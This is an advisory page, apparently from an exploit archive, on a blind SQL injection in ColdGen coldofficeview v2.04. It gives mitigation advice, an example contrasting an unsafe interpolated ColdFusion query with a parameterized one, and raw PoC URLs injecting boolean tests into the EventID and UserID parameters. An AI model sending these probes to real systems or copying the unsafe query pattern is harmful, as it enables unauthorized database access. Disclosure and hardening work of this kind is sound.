Vendor: coldofficeview
By: mr_me
CVSS: 8,8 HIGH
Remote Blind SQL Injection
CWE: 89
Product Name: coldofficeview
Affected Version From: 2.04
Affected Version To: 2.04
Patch Exists: NO
Related CWE: N/A
CPE: a:coldgen:coldofficeview:2.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ColdGen – coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities

ColdGen's coldofficeview v2.04 is vulnerable to Remote Blind SQL Injection. This vulnerability can be exploited by sending a maliciously crafted HTTP request to the vulnerable application. The PoCs provided demonstrate how an attacker can use the EventID and UserID parameters to inject malicious SQL code into the application.

Mitigation:

Input validation should be used to prevent malicious SQL code from being injected into the application. Additionally, the application should be configured to use parameterized queries.
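
The mitigation above, sketched for the EventID parameter as an added example (not ColdGen's code and not part of the original advisory): the interpolated-query pattern that produces the true/false behaviour seen in the PoCs, next to a validated and parameterized form. The table, column and datasource names are hypothetical; the same change applies to UserID.

```cfml
<!--- Added example. Events, Title, StartDate and application.dsn are
      hypothetical names; the real schema is not shown in the advisory. --->

<!--- Pattern to replace: the URL value is interpolated into the SQL text,
      so a value such as "1 and 1=2" becomes part of the WHERE clause and
      the page content changes with the truth of the injected condition. --->
<cfquery name="qEventUnsafe" datasource="#application.dsn#">
    SELECT EventID, Title, StartDate
    FROM Events
    WHERE EventID = #url.EventID#
</cfquery>

<!--- Hardened form, step 1: input validation.
      Reject the request before any query runs if EventID is missing
      or is not an integer. --->
<cfif NOT structKeyExists(url, "EventID") OR NOT isValid("integer", url.EventID)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfabort>
</cfif>

<!--- Hardened form, step 2: parameterized query.
      cfqueryparam sends the value as a bound parameter, separate from the
      SQL text, and raises an error if it does not match cfsqltype. --->
<cfquery name="qEvent" datasource="#application.dsn#">
    SELECT EventID, Title, StartDate
    FROM Events
    WHERE EventID = <cfqueryparam value="#url.EventID#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Return the same "not found" response for every miss so the page
      gives no signal beyond whether the record exists. --->
<cfif qEvent.recordCount EQ 0>
    <cfheader statuscode="404" statustext="Not Found">
    <cfabort>
</cfif>
```
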
Source

Exploit-DB raw data:

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false